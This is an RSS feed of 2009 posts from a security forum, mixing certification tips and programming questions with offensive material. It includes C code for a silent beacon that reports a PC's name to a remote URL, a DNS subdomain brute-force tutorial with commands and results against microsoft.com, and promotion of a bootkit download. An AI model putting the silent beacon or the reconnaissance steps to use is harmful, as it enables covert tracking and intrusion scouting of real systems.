<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
	<title>Last Posts</title>
	<description>GSO Last Posted Forums</description>
	<link>http://www.governmentsecurity.org/forum/index.php</link>
	<pubDate>Thu, 19 Nov 2009 23:09:15 +0000</pubDate>
	<ttl>1</ttl>
	<item>
		<title>Guest Post - Https Data Exposure - Get Vs Post</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32266</link>
		<description><![CDATA[Here is a quick chart showing the data exposure when considering GET vs POST and also HTTP vs HTTPS.<br />
<br />
<br />
<br />
<ul class='bbc'><li>URL arguments refer to arguments in the URL for GET or POST (e.g. foo.com?arg1=something).</li><li>Body arguments refer to data communicated via POST parameters in the HTTP request body.</li></ul> NOTE: This chart does not address client-side caching of temporary files. Caching is a separate issue from the protocol selection and should be addressed with appropriate cache-control headers.<br />
<br />
A quick conclusion: The secure choice for transmission of any sensitive data is to use POST statements over SSL/TLS. Any other option will expose data at some point in the communication.<br />
<br />
Full post<br />
<a href='http://www.shortinfosec.net/2009/11/https-data-exposure-get-vs-post.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.shortinfosec.net/2009/11/https-data-exposure-get-vs-post.html</a>]]></description>
		<pubDate>Thu, 19 Nov 2009 23:09:15 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32266</guid>
	</item>
	<item>
		<title>Is There A Feature To View All New Posts Since Last Login?</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32265</link>
		<description><![CDATA[I remember before the forum upgrade you were able to log in and check 'new posts' and any posts being created since your last visit was shown. Now I can only seem to find the 'active in the last 24 hours'.<br />
<br />
Is this feature still available? Can't seem to find it.<br />
<br />
Cheers.]]></description>
		<pubDate>Thu, 19 Nov 2009 10:51:52 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32265</guid>
	</item>
	<item>
		<title>Vpn Anonym</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32261</link>
		<description><![CDATA[Hi,<br />
<br />
I just want to know: if I send an email and surf on the internet, for example a site, while I am already connected to a VPN, is it possible to find out my real IP? I mean the site owner or the mail receiver! If yes, I wonder how!]]></description>
		<pubDate>Thu, 19 Nov 2009 06:22:17 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32261</guid>
	</item>
	<item>
		<title>5 Important Things To Know About The A Plus Certification</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32264</link>
		<description><![CDATA[<span style='font-size: 13px;'><span style='font-family: Trebuchet MS'><strong class='bbc'>1. The A plus is what most people start with<br />
</strong>CompTIA (the vendor offering this certification) got it right with the A+ certification. It's extremely popular, and no wonder why. The A+ is the very first step on our career ladder and a very important one. Studying for this cert we get down to the basics of what computers are - hardware and software - and learn in depth everything that is important about them. This is what the A+ gives you - an extremely important foundation to work on. Nearly nobody stops at the A+ - it's our very first step towards obtaining other higher certs, which give us higher positions and more money in our pockets.<br />
<strong class='bbc'>2. How to study for it [this is important]</strong><br />
New people in the industry feel unsure about how best to take this first step on their career ladders. Getting your first certification is like getting your first kiss - you always remember more details about it than about any other cert you will be getting after that. Always opt to self-study, unless your employer is willing to pay for a training school or boot camp. The truth is, entry certifications build a foundation to work on. They do not land you the big bucks. That comes later. Spending lots of money on training for entry certs doesn't make financial sense.<br />
<strong class='bbc'>3. There are 4 exams you can choose. Which ones do you do?</strong><br />
The A+ essentials (exam 220-601) is the first one you must pass. After that, you have the choice of:<br />
IT Technician (220-602) <br />
Remote Support Technician (220-603) <br />
Depot Technician (220-604) <br />
Most people do the IT Technician one, as it gives you more rounded knowledge. The other two specialize, so to speak; you should choose either of them only if your job requires it.<br />
<strong class='bbc'>4. Where can you book the exam?</strong><br />
All CompTIA exams are booked through Prometric or VUE. Once you have finished studying, go to either website and choose your nearest testing center. Pay the fee and book the exam on the date of your choice. Now you are all set. When you go to the training center, arrive 30 minutes beforehand and don't forget to bring 2 forms of ID with you.<br />
<strong class='bbc'>5. How long does it take for the certification to arrive?</strong><br />
When you complete your exam at the training center and you pass, they will give you a piece of paper stating you have passed the exam. You can use that on your resume for the moment to show employers you are now A+ certified. The actual certification will be posted to you by CompTIA, and this takes around 2 to 6 weeks.<br />
</span></span>For more certification information you can check passcert]]></description>
		<pubDate>Thu, 19 Nov 2009 03:18:34 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32264</guid>
	</item>
	<item>
		<title>Files Download</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32263</link>
		<description>So when can I download files, as it will not allow me to..</description>
		<pubDate>Thu, 19 Nov 2009 02:15:59 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32263</guid>
	</item>
	<item>
		<title><![CDATA[[Help] Gui C++ Library]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32181</link>
		<description><![CDATA[Hey guys , <br />
<br />
Just need some help... I'm after a GUI C++ library, mainly want an open source one or a free one (W-bb)<br />
<br />
Thanks , <br />
DuSTY <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/laugh.gif' class='bbc_emoticon' alt=':lol:' />]]></description>
		<pubDate>Thu, 19 Nov 2009 01:58:57 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32181</guid>
	</item>
	<item>
		<title>How To Make This Program Not Display Error When No Internet Connection?</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32196</link>
		<description><![CDATA[As the title says, I have a program that someone from this forum helped me with in the past, and I need some help again by the looks of it. I don't know much about programming, so bear with me. This app was written in the past to work along with a PHP script I had running on my web server. The purpose was to notify my web server whenever this program was run, and the PHP script would log the time & date along with the IP and computer name that the notification came from.<br />
<br />
So this app, when run, would simply look up the PC's 'computer name', then go to a certain URL where the PHP script was located and append the computer's name to the URL. For example, the program would open this URL "http://www.YOUR-WEBSITE.com/c.php?pc=" and append the computer name it looked up to the end of it.<br />
<br />
Now my problem is this program is supposed to run silently in the background, which it does most of the time. The problem is, if the program is run when the internet connection is down or unavailable, the program will pop up and display an error message. I need help making it so that no matter what, this program doesn't display any messages of any kind, error or otherwise; even if no internet connection is available I want it to just silently close.<br />
<br />
Does anyone know how I would go about modifying the below source code to do this?<br />
<br />
<pre class='prettyprint'>
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;windows.h&gt;
#include &lt;wininet.h&gt;

#pragma comment( linker, "/subsystem:&#092;"windows&#092;" /entry:&#092;"mainCRTStartup&#092;"" )
#pragma comment (lib, "Wininet.lib")

int main(int argc, char* argv&#91;&#93;)
{
	HINTERNET Initialize, Connection;
	char cBuffer&#91;MAX_COMPUTERNAME_LENGTH+1&#93; = {'&#092;0'};
	DWORD dwBytes = MAX_COMPUTERNAME_LENGTH+1;
	// Must hold the base URL plus the computer name plus the terminating NUL
	char logUrl&#91;100&#93; = {'&#092;0'}; //Make It Smaller (url length + MAX_COMPUTERNAME_LENGTH + 1)

	strcpy(logUrl, "http://www.YOUR-WEBSITE.com/c.php?pc=");

	//BOOL GetComputerName(LPTSTR lpBuffer, LPDWORD lpnSize);
	if(! GetComputerName(cBuffer, &dwBytes))
	{
		// GetLastError() returns a DWORD, not a string: print it with %lu, never %s
		printf("~~GetComputerName() Failed! Last Error:%lu&#092;n", (unsigned long)GetLastError());
		return 1;
	}
	//Append Computer Name
	strcat(logUrl, cBuffer);

	Initialize = InternetOpen( "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", 
				INTERNET_OPEN_TYPE_PRECONFIG , NULL, NULL, 0);
	if(! Initialize)
	{
		printf("~~InternetOpen() Failed! Last Error:%lu&#092;n", (unsigned long)GetLastError());
		return 1;
	}

	// Make The Connection To The URL
	// This Is All That Is Needed To Get Your PHP Script To Log The IP & Computer Name
	Connection = InternetOpenUrl(Initialize, logUrl, NULL, 0,
		INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_RELOAD, 0);
	if(! Connection)
	{	
		printf("~~InternetOpenUrl() Failed! Last Error:%lu&#092;n", (unsigned long)GetLastError());
		InternetCloseHandle(Initialize);
		return 1;
	}

	//Close Handles
	InternetCloseHandle(Connection);
	InternetCloseHandle(Initialize);

	return 0;
}
</pre><br />
<br />
Thanks in advance for anyone that can help!<br />
<br />
-elistian]]></description>
		<pubDate>Thu, 19 Nov 2009 01:51:56 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32196</guid>
	</item>
	<item>
		<title>How We Can Change Symbol In Password Field In Javascript?</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32260</link>
		<description><![CDATA[Friends, I want to know how we can change the text symbol in a password field by using JavaScript. I mean by default there is a filled circle, but I want this symbol: "*".]]></description>
		<pubDate>Wed, 18 Nov 2009 11:13:00 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32260</guid>
	</item>
	<item>
		<title>How To Extract Hosts In Dns Servers That Block Zone Transfer.</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=22666</link>
		<description><![CDATA[Hi guys,<br />
<br />
My first post here. I will add an article I wrote specially for GovernmentSecurity; I hope it is useful to someone.<br />
<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>Extract hosts in DNS Servers that disallow zone transfers.<br />
<br />
<br />
INTRODUCTION:<br />
-------------<br />
<br />
Everybody knows that the first step in an attack is reconnaissance of the target, in the following sequence:<br />
<br />
- List the machines that are part of the target.<br />
- Identify services and versions on each of these machines.<br />
<br />
It's essential, because if an attacker can't list which machines are part of the target, he has nothing to attack.<br />
<br />
Listing the machines that are part of the target is very useful to attackers when they intend to attack a well-protected network, since the main servers would be hardened and constantly monitored, so if an attacker finds less important machines he will probably:<br />
<br />
- Find machines that aren't as protected as the main servers.<br />
- Find machines that are less monitored.<br />
- The more machines an attacker finds, the bigger the chance of finding a vulnerability.<br />
<br />
In the good old days attackers used DNS zone transfers to list all machines in a domain they planned to attack; however, DNS zone transfers have been working more rarely because of enhanced security.<br />
<br />
Just to illustrate, let's try a DNS zone transfer from microsoft.com:<br />
<br />
<br />
FatalFury:~/tmp# dig microsoft.com axfr<br />
<br />
; &lt;&lt;&gt;&gt; DiG 9.2.3 &lt;&lt;&gt;&gt; microsoft.com axfr<br />
;; global options:  printcmd<br />
; Transfer failed.<br />
<br />
<br />
As we expected, the DNS zone transfer failed; however, there is a way to extract these hosts, called DNS host brute force, which basically brute-forces common host names via DNS queries and, based on the response from the DNS server, identifies whether each host exists or not.<br />
<br />
To explain in detail how it works, let's suppose that an attacker wants to list hosts in the domain microsoft.com; the following steps will be followed:<br />
<br />
1) The program opens a wordlist of common hostnames and reads them one by one.<br />
<br />
2) Each hostname entry in this file will be concatenated with the domain, for example auth.microsoft.com, database.microsoft.com, ftp.microsoft.com, etc.<br />
<br />
3) Each of these generated FQDNs (fully qualified domain names) will be requested from the DNS server.<br />
<br />
4) The DNS server will respond to the client saying "auth at microsoft.com is a non-existent host", so based on this response the program knows that this host doesn't exist.<br />
<br />
5) The DNS server will respond to the client saying "database at microsoft.com is a non-existent host", so based on this response the program knows that this host doesn't exist.<br />
<br />
6) The DNS server will respond to the client saying "ftp at microsoft.com points to IP address A.B.C.D", so based on this response the program knows that the host exists with the respective IP address A.B.C.D and saves it in the list of found hosts.<br />
<br />
<br />
<br />
THE TOOL OF THE TRADE:<br />
----------------------<br />
<br />
<br />
To illustrate the use of DNS host brute force we will use a tool called WS-DNS-BFX, which in my opinion is the best since it:<br />
<br />
- Is very fast because it uses multiple threads.<br />
- Supports IPv4 and IPv6.<br />
- Extracts multiple IPs for a single domain name (domains with network load balancing).<br />
- Runs on Linux or Windows with Cygwin.<br />
<br />
This tool can be downloaded from <a href='http://ws.hackaholic.org/tools/WS-DNS-BFX.tgz' class='bbc_url' title='External link' rel='nofollow external'>http://ws.hackaholic.org/tools/WS-DNS-BFX.tgz</a><br />
<br />
<br />
<br />
INSTALLATION:<br />
-------------<br />
<br />
<br />
Installation is very easy; just untar it like this:<br />
<br />
FatalFury:~/tmp# tar -xvzf WS-DNS-BFX.tgz<br />
./<br />
./README-pt.txt<br />
./dict-file.txt<br />
./Changelog.txt<br />
./WS-DNS-BFX.c<br />
./README-en.txt<br />
./hosts-yahoo.com.txt<br />
./WS-DNS-BFX-Static<br />
<br />
<br />
<br />
Now we just need to compile it like this:<br />
<br />
FatalFury:~/tmp# gcc -o WS-DNS-BFX WS-DNS-BFX.c -lpthread -D_REENTRANT -D_THREAD_SAFE<br />
<br />
<br />
<br />
Let's run the compiled program to test whether everything worked:<br />
<br />
FatalFury:~/tmp# ./WS-DNS-BFX<br />
<br />
<br />
    DNS Brute Force eXtract by: Clube Dos Mercenarios & Front The Scene<br />
<br />
    URLs: <a href='http://cdm.frontthescene.com.br' class='bbc_url' title='External link' rel='nofollow external'>http://cdm.frontthescene.com.br</a><br />
          <a href='http://www.frontthescene.com.br' class='bbc_url' title='External link' rel='nofollow external'>http://www.frontthescene.com.br</a><br />
<br />
    Contact: dum_dum@frontthescene.com.br<br />
<br />
<br />
USAGE mode:<br />
./WS-DNS-BFX &lt;domain&gt; &lt;brute force file&gt; &lt;simultaneous conn&gt;<br />
<br />
<br />
<br />
USAGE:<br />
------<br />
<br />
<br />
Now that we have the tool compiled, we will use a syntax like this:<br />
<br />
./WS-DNS-BFX microsoft.com dict-file.txt 14<br />
<br />
<br />
WS-DNS-BFX      -  is the name of the tool.<br />
microsoft.com   -  is the domain name we will extract hosts from.<br />
dict-file.txt   -  is a dictionary file containing common host names, which is included with the tool.<br />
14              -  is the number of parallel threads that will be used.<br />
<br />
NOTE: You should create and use a more robust dictionary file to get better results.<br />
<br />
NOTE: The number of parallel threads should be chosen based on your connection speed; see README-en.txt for more details.<br />
<br />
Let's test the tool to see if it really works:<br />
<br />
FatalFury:~/tmp# time ./WS-DNS-BFX microsoft.com dict-file.txt 14<br />
Progress ...........<br />
<br />
<br />
real    0m3.672s<br />
user    0m0.580s<br />
sys     0m1.380s<br />
<br />
In my case with 14 parallel connections it probed 361 hosts in less than 4 seconds! <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
<br />
It generated a report file called hosts-microsoft.com.txt; let's check it:<br />
<br />
FatalFury:~/tmp# cat hosts-microsoft.com.txt<br />
  -= DNS Brute Force eXtract by Clube Dos Mercenarios e Front The Scene =-<br />
<br />
www.microsoft.com{<br />
207.46.20.60<br />
207.46.198.30<br />
207.46.198.60<br />
207.46.199.30<br />
207.46.225.60<br />
207.46.19.30<br />
207.46.19.60<br />
207.46.20.30}<br />
<br />
mail.microsoft.com{<br />
131.107.1.71<br />
131.107.0.15}<br />
<br />
ftp.microsoft.com{<br />
207.46.236.102}<br />
<br />
windows.microsoft.com{<br />
207.46.250.115<br />
207.46.130.104}<br />
<br />
exec.microsoft.com{<br />
207.46.248.35}<br />
<br />
ircs.microsoft.com{<br />
131.107.3.108}<br />
<br />
support.microsoft.com{<br />
207.46.248.248}<br />
<br />
register.microsoft.com{<br />
207.46.232.188}<br />
<br />
download.microsoft.com{<br />
208.172.65.62<br />
4.78.212.30<br />
206.24.233.62}<br />
<br />
search.microsoft.com{<br />
209.152.127.218<br />
209.152.119.242}<br />
<br />
<br />
As we can see, it extracted 10 different host names, and several distinct IPs for the same host name, which indicates that they are behind a network load balancer.<br />
<br />
<br />
<br />
CONCLUSION:<br />
----------<br />
<br />
Even with the restrictions on DNS zone transfers, attackers with WS-DNS-BFX and a GOOD dictionary file can extract many hosts, which can be very useful to them.<br />
<br />
The best method to detect this kind of attack is to monitor the requests to your DNS server and check for a high number of requests in sequence from a single IP with many replies saying "host non-existent".</div></div><br />
<br />
Obs: I have compiled a good wordlist for this kind of test; if someone is interested in it I can upload it somewhere.<br />
<br />
Cheers]]></description>
		<pubDate>Wed, 18 Nov 2009 09:51:17 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=22666</guid>
	</item>
	<item>
		<title>Beginner In Need Of Some Guidance, C#</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=27847</link>
		<description><![CDATA[Hello everyone, I'm new to the site. I'm currently in college as a computer science major and will be starting my programming courses, hopefully, in the fall. I thought I might get a head start on the curriculum and brush up on my programming before I started my classes and was thinking of starting with C#. From what I have heard, C# is similar to VB, which I learned back in middle school but didn't use much afterwards, so I have forgotten most of it. I have also attempted, a few times, to dabble in C++, but each time I had some problems with libraries and compiling in Windows. I have been using Linux for several years out of my own curiosity and from that I learned the ins and outs of compiling programs using gcc, but for some reason my compilers in Windows never seem to work. However, I recently got hold of a copy of Visual Studio 2003 Professional through my school's MSDNAA program and thought that I might start by seeing if maybe it works better for me than other compilers I have tried in the past.<br />
<br />
I'm looking for some guidance as to where to learn C# on the internet. I found some from searching through Google, but I'm not sure which ones are any good and which ones I should avoid. Any suggestions that could be provided for good online tutorials would be greatly appreciated.<br />
<br />
Thank you.]]></description>
		<pubDate>Wed, 18 Nov 2009 00:22:25 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=27847</guid>
	</item>
	<item>
		<title>C# And Ipb Communication</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28165</link>
		<description>What class or classes would I use in order to communicate with IPB in C#? I just need to log in and make a post.</description>
		<pubDate>Wed, 18 Nov 2009 00:14:33 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28165</guid>
	</item>
	<item>
		<title>How To Trust Cloud Computing</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32257</link>
		<description><![CDATA[Cloud Computing is becoming more and more the buzzword of every conference, meeting and article. Yet it is still in its inception, and there are a multitude of issues and problems. Cloud services are springing up like mushrooms after rain, and all the big players want a piece of the pie.<br />
<br />
Here are the mechanisms by which we can approach the level of trust that we have in our infrastructure for the cloud. But bear in mind that each approach can have its own pitfall!<br />
<br />
Full Story<br />
<a href='http://www.shortinfosec.net/2009/11/how-to-trust-cloud-computing.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.shortinfosec.net/2009/11/how-to-trust-cloud-computing.html</a>]]></description>
		<pubDate>Tue, 17 Nov 2009 21:09:43 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32257</guid>
	</item>
	<item>
		<title>Offensive Security Has A Milw0Rm Replacement</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32255</link>
		<description><![CDATA[Milw0rm is not being updated much anymore, but it seems offensive-security has started its own archive:<br />
<br />
/http://exploits.offensive-security.com/]]></description>
		<pubDate>Tue, 17 Nov 2009 09:05:01 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32255</guid>
	</item>
	<item>
		<title>Stoned Bootkit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32248</link>
		<description><![CDATA[<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>"Stoned Bootkit is a new Windows bootkit which attacks all Windows versions from XP up to 7. It is loaded before Windows starts and is memory resident up to the Windows kernel. Thus Stoned gains access to the entire system. It has exciting features like integrated file system drivers, automatic Windows pwning, plugins, boot applications and much much more. The project is partly published as open source under the European Union Public License. Like in 1987, "Your PC is now Stoned! ..again". <br />
Peter Kleissner, Software Dev. Guru in Vienna <br />
<br />
"A bootkit is a rootkit that is able to load from a master boot record and persist in memory all the way through the transition to protected mode and the startup of the OS. It's a very interesting type of rootkit." - Robert Hensing about bootkits <br />
<br />
Stoned..<br />
<br />
■is a software in the Master Boot Record, with the target to be memory resident up to the Windows kernel<br />
■attacks Windows XP, Server 2003, Vista, Server 2008, 7<br />
■supporting architecture: IA32, AT Architecture (IBM-conforming)<br />
■full featured, including own file system drivers for FAT and NTFS!<br />
■supports different boot media, hard disk, removable-media, cd, dvd, flash drives, network..<br />
■there will be new versions, plugins and updates!<br />
It has been successfully tested and verified on the following systems: <br />
<br />
Windows 2000 SP4<br />
Windows XP SP2<br />
Windows XP SP3<br />
Windows Server 2003<br />
Windows Server 2003 R2 SP2<br />
Windows Vista<br />
Windows Vista SP1<br />
Windows Server 2008<br />
Windows 7 Build 6801<br />
Windows 7 Beta<br />
Windows 7 RC<br />
Windows 7<br />
<br />
DiskCryptor 0.7<br />
DiskCryptor 0.8<br />
TrueCrypt 6.1a<br />
TrueCrypt 6.2<br />
TrueCrypt 6.2a<br />
<br />
Bochs 2.4.1<br />
VMware Workstation 6.5.0<br />
<br />
EeePC 901             Windows XP SP3<br />
Dell Studio XPS 16    Windows Vista SP1</div></div><br />
<br />
<br />
Read the full article + FAQ at :<br />
<br />
h**p://www.stoned-vienna.com/<br />
<br />
There you will be able to download the software and burn it to a live CD, then test it.]]></description>
		<pubDate>Mon, 16 Nov 2009 21:15:31 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32248</guid>
	</item>
	<item>
		<title>Guest Post - It Risks Vs. Information Risks</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32256</link>
		<description><![CDATA[As an Information Security professional I think it is increasingly important to understand the difference between IT Risk and Information Risks. You should also understand the advantages in enabling business strategies by ensuring that you brand each one of these risks accordingly. <br />
<br />
Here are my high level definitions:<br />
<br />
 <ul class='bbc'><li><strong class='bbc'>IT Risks </strong>- The probability that a vulnerability of an information technology solution or asset will be exploited and the likely damage from the exploitation.</li><li><strong class='bbc'>Information Risks</strong> - The probability that information/data can be exploited and the likely damage from the exploitation.</li></ul> While these may seem similar to the layman, they should clearly be viewed and positioned differently by the Information Security professional. Here's why:<br />
<br />
<br />
<ul class='bbc'><li><strong class='bbc'>IT Risks</strong> should have a focus on technology, while </li><li><strong class='bbc'>Information Risks</strong> should not have a focus on technology.</li></ul><br />
This is a guest post by Mark Brooks, a consultant and leader in the field of global information risk, security, and compliance.<br />
<br />
Full story <a href='http://www.shortinfosec.net/2009/11/it-risks-vs-information-risks.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.shortinfosec.net/2009/11/it-risks-vs-information-risks.html</a>]]></description>
		<pubDate>Mon, 16 Nov 2009 19:45:01 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32256</guid>
	</item>
	<item>
		<title>Google Wave Invites</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32131</link>
		<description><![CDATA[Hi,<br />
<br />
As you may know, Google Wave has released over 100.000 invites, each holding 8 other invitations. Would anyone happen to have one for me? My invites will be spread among GSO's members of course <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
<br />
Regards,<br />
<br />
Dennis]]></description>
		<pubDate>Mon, 16 Nov 2009 17:45:14 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32131</guid>
	</item>
	<item>
		<title>Vb.net 2k5 Packet Reading And Logging</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=18907</link>
		<description><![CDATA[I'm trying to write a program to read the packets from a specific application and upload those packets as text files to a remote server.<br />
<br />
Any ideas how I can do this?<br />
The only dev software I have at this time is Visual Studio 2k5 Express.]]></description>
		<pubDate>Mon, 16 Nov 2009 04:34:33 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=18907</guid>
	</item>
	<item>
		<title>Messenger Bot</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=25889</link>
		<description><![CDATA[Does anybody have any resources or links where I can find a Windows Messenger "Bot"?<br />
<br />
All I want it to do is log in and basic chat.<br />
<br />
I've found 1000s on Google that all seem outdated (like 2001) and no longer work..<br />
<br />
This is not a request for IRC bots or botnets, but a simple MSNBOT.<br />
<br />
<br />
thanks!]]></description>
		<pubDate>Sun, 15 Nov 2009 21:48:13 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=25889</guid>
	</item>
	<item>
		<title>Ipsec Debugging</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32254</link>
		<description><![CDATA[Hey guys,<br />
<br />
I have to do a brown bag at work going over IPSec debugging...specifically ASAs and PIX. Whenever I look around for information on IPSec debugging I am only able to find debug output and then the answer on what the problem is. Any ideas as to where to find an actual white paper or other documentation on how to decipher a lot of the information given in a debug?<br />
<br />
Appreciate your help,<br />
<br />
-Lex]]></description>
		<pubDate>Sun, 15 Nov 2009 19:27:45 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32254</guid>
	</item>
	<item>
		<title>Owasp Publishes Top 10 Web App Security Risks For 2010</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32247</link>
		<description><![CDATA[Last night the OWASP project published the 2010 issue of their Top 10 Web Application Security Risks. The list is still in Release Candidate status, so it may change. It is evident that OWASP hasn't reinvented the wheel, and that this list has already been discussed for years. Yet it still falls on deaf ears for many developers.<br />
<br />
Full story <br />
<a href='http://www.shortinfosec.net/2009/11/owasp-publishes-top-10-web-app-security.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.shortinfosec.net/2009/11/owasp-publishes-top-10-web-app-security.html</a>]]></description>
		<pubDate>Sat, 14 Nov 2009 18:18:53 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32247</guid>
	</item>
	<item>
		<title>Is There Software Which Will Block Incoming Connections Based On The Ports They Have Open?</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32245</link>
		<description><![CDATA[Hi,<br />
<br />
I would like to be able to block certain IPs from connecting to my machine based on which ports they have open. Does this software exist?<br />
<br />
If there is not a specific package that can do this then I was thinking of piping tcpdump to a Perl script which grabs the IP of any new connection, nmaps them and blocks them using iptables if they have certain ports open. Obviously there would be a few seconds when they would not be blocked - I don't particularly mind this. Could probably start off with a very low MTU and increase it once they have passed the portscan. Does anyone have any advice / suggestions about this?<br />
<br />
The purpose of this is to stop people from connecting to the machine via SSH shells, RDP, VNC, proxies, tor, i2p, freenet etc etc.<br />
<br />
Thanks,<br />
<br />
Fractal5]]></description>
		<pubDate>Sat, 14 Nov 2009 12:35:44 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32245</guid>
	</item>
	<item>
		<title>Bypassing Stack Cookies, Safeseh, Hw Dep And Aslr</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32246</link>
		<description><![CDATA[This is an article I found very informative.<br />
Should be a good read for exploit writers.<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>The success of all of these exploits (whether they are based on direct ret overwrite or exception handler structure overwrites) are based on the fact that a reliable return address or pop/pop/ret address must be found, making the application jump to your shellcode. In all of these cases, we were able to find a more or less reliable address in one of the OS dll’s or application dll’s. Even after a reboot, this address stays the same, making the exploit work reliably.<br />
<br />
Fortunately for the zillions Windows end-users out there, a number of protection mechanisms have been built-in into the Windows Operating systems.<br />
<br />
- Stack cookies (/GS Switch cookie) <br />
<br />
- Safeseh (/Safeseh compiler switch) <br />
<br />
- Data Execution Prevention (DEP) (software and hardware based) <br />
<br />
- Address Space Layout Randomization (ASLR)</div></div><br />
<br />
<a href='http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/' class='bbc_url' title='External link' rel='nofollow external'>http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/</a>]]></description>
		<pubDate>Sat, 14 Nov 2009 06:29:29 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32246</guid>
	</item>
	<item>
		<title>Analysis Of Windows Security Logs With Ms Log Parser</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32243</link>
		<description><![CDATA[When investigating an intrusion in a Windows system, one of the first places to start is the Windows security log. The security event log is also very useful for analysis when searching for anomalies and possible intrusions.<br />
<br />
Reading through a Windows security log or any other log can be very difficult and time consuming, so a lot of companies have created their own tools to analyze Windows event logs. But before you start going commercial, there is a tool that will get you going without any cost. Against all odds, it's a tool made by Microsoft!<br />
<br />
The tool<br />
The tool in question is <a href='http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en' class='bbc_url' title='External link' rel='nofollow external'>Microsoft Log parser</a>. Log parser is a command line tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system, and Active Directory. So, you can use it to analyze most structured text based files and the eventlog and AD on a single computer.<br />
<br />
Full Story<br />
<a href='http://www.shortinfosec.net/2009/11/analysis-of-windows-security-logs-with.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.shortinfosec.net/2009/11/analysis-of-windows-security-logs-with.html</a>]]></description>
		<pubDate>Sat, 14 Nov 2009 06:20:09 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32243</guid>
	</item>
	<item>
		<title>Enable Telnet Server Xp</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=27857</link>
		<description>Does Windows XP come with a telnet server? If so, how do I enable it on my computer so I can telnet to it?</description>
		<pubDate>Sat, 14 Nov 2009 05:19:45 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=27857</guid>
	</item>
	<item>
		<title>Very Important! Which Services Can I Install On Windows Which Are Easily Exploitable Although Pref Not Via Proxies</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32212</link>
		<description><![CDATA[Background information:<br />
